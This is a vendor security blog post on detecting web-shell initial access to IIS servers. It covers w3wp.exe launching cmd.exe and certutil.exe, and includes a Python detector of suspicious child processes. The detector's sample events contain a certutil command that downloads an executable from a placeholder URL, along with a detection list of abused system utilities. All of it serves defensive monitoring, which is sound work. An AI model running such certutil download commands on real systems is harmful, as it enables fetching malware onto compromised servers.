Initial Access to IIS Web Servers Detected by AhnLab EDR

Network and device search engines such as Shodan make it easy to look up information on Internet-connected devices anywhere in the world. Threat actors use the same search engines to collect information on attack targets or to select devices for port scanning. With the information collected, they look for weaknesses in the target system and attempt initial access, and from there pursue goals such as lateral movement and ransomware distribution. Corporate security administrators who operate externally exposed IT assets must therefore manage those assets continuously and monitor them for abnormal behavior.

AhnLab Endpoint Detection and Response (EDR) is a next-generation threat detection and response solution that provides threat monitoring, analysis, and response capabilities for endpoints based on Korea’s only self-developed behavior-based engine. AhnLab EDR continuously collects information on suspicious behaviors by type, so that users can accurately assess threats from a detection, analysis, and response perspective. Users can then perform comprehensive analysis on that data to identify root causes, respond with appropriate measures, and establish processes that prevent recurrence.

This post will cover how AhnLab EDR can be used to detect and respond to initial access to Windows Internet Information Services (IIS) web servers by threat actors.

1. IIS Worker Process (w3wp.exe)

The w3wp.exe process is the worker process of the IIS web server. It hosts an application pool, handles the HTTP requests for the sites assigned to that pool, and runs the ASP.NET applications. Generally, threat actors identify attack targets using network device search engines such as Shodan. When a web server running a vulnerable version is identified, they exploit a vulnerability matching that version to install web shells or execute malicious commands. Commands executed through a web shell inherit w3wp.exe as their parent process, which is why a system utility such as cmd.exe running as a child of w3wp.exe is a strong indicator of compromise: a normal IIS worker process has little reason to spawn a command interpreter.

In the ASEC Blog post “Case of Malware Distribution Linking to Illegal Gambling Website Targeting Korean Web Server”, published on May 8th, 2024, threat actors were shown to download the Meterpreter backdoor using legitimate Windows utilities (cmd.exe and certutil.exe). Although no web shell detection logs were found on the compromised server, the Meterpreter backdoor appears to have been executed via a web shell, since cmd.exe was launched by the w3wp.exe process.

Figure 1. Logs showing the detection of cmd and certutil being executed by a web shell (1)
Figure 2. Logs showing the detection of cmd and certutil being executed by a web shell (2)
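The parent-process relationship described above can be turned into a simple detection rule. The following is an added example written for this post, not AhnLab EDR's engine or any of its detection rules. It walks a batch of process-creation events, flags living-off-the-land binaries (cmd.exe, certutil.exe, etc.) whose ancestor chain leads back to w3wp.exe, and raises the severity when certutil is invoked as a downloader. The event field names (pid, ppid, image, cmdline) are an assumption loosely modelled on Sysmon Event ID 1 / Windows 4688 data, and the sample events, PIDs, and URL are constructed, not real telemetry.

```python
"""Flag suspicious child processes of the IIS worker process (w3wp.exe).

Added example for this post; not AhnLab's code. Event schema (pid, ppid,
image, cmdline) is assumed, and the sample events are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Utilities an IIS worker process has little legitimate reason to spawn.
# Every hit is a web-shell candidate; tune the list for your own applications.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "bitsadmin.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe",
    "whoami.exe", "net.exe", "nltest.exe",
}

# certutil used as a downloader: "certutil -urlcache -f <url> <file>"
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b.*\bhttps?://", re.IGNORECASE)


@dataclass
class Alert:
    pid: int
    parent: str      # immediate parent image name
    image: str       # flagged process image name
    severity: str    # "high" or "critical"
    reason: str


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events: List[Dict]) -> List[Alert]:
    """Return an Alert for each suspicious process that descends from w3wp.exe.

    The full ancestor chain is checked, not just the direct parent, because a
    web shell typically spawns cmd.exe, which in turn spawns certutil.exe.
    """
    by_pid = {e["pid"]: e for e in events}
    alerts: List[Alert] = []
    for e in events:
        image = _basename(e["image"])
        if image not in SUSPICIOUS_CHILDREN:
            continue
        # Walk up the parent chain as far as this event batch allows.
        ancestors: List[str] = []
        ppid = e["ppid"]
        while ppid in by_pid:
            ancestors.append(_basename(by_pid[ppid]["image"]))
            ppid = by_pid[ppid]["ppid"]
        if "w3wp.exe" not in ancestors:
            continue
        severity = "high"
        reason = f"{image} descends from w3wp.exe via {' <- '.join(ancestors)}"
        cmdline = e["cmdline"]
        if "certutil" in cmdline.lower() and CERTUTIL_DOWNLOAD.search(cmdline):
            severity = "critical"
            reason += "; certutil used as a downloader"
        alerts.append(Alert(e["pid"], ancestors[0], image, severity, reason))
    return alerts


# Constructed sample events (not real telemetry); PIDs, paths and URL are made up.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 600, "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": r'c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool"'},
    {"pid": 5210, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c certutil -urlcache -f http://example.invalid/a.exe C:\Windows\Temp\a.exe"},
    {"pid": 5222, "ppid": 5210, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -urlcache -f http://example.invalid/a.exe C:\Windows\Temp\a.exe"},
    # Benign: an administrator's interactive shell, whose parent is explorer.exe.
    {"pid": 7001, "ppid": 3000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe"},
    {"pid": 3000, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
]

if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"[{a.severity}] pid={a.pid} parent={a.parent} {a.reason}")
```

Running the block reports the cmd.exe and certutil.exe events as critical and ignores the administrator's cmd.exe under explorer.exe. In practice the ancestor walk should run against the full process tree rather than one batch, and applications that legitimately spawn helpers from w3wp.exe (image converters, report generators) need an allow-list so the rule stays low-noise.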

Conclusion

Threat actors attempt initial access through a variety of externally exposed attack surfaces such as MS-SQL, Redis, MeshAgent, and Windows IIS. Because these services can be found through Internet-wide scanning services such as Shodan, corporate security administrators must practice attack surface management to identify assets that may be exposed to threat actors and regularly apply security patches.

AhnLab Endpoint Protection Platform (EPP) and AhnLab Endpoint Detection and Response (EDR) help prevent security incidents through automated patch management, and allow administrators to securely manage and operate corporate infrastructure in an integrated way by continuously monitoring endpoints and servers and providing visibility into threats to the endpoint environment.

Behavior Detection
– InitialAccess/DETECT.Event.M11451
– Execution/DETECT.Behavior.M10699

AhnLab EDR protects the endpoint environment by delivering behavioral detection, advanced analysis, holistic visibility, and proactive threat hunting. For more information about the product, please visit our official website.

The post Initial Access to IIS Web Servers Detected by AhnLab EDR appeared first on ASEC BLOG.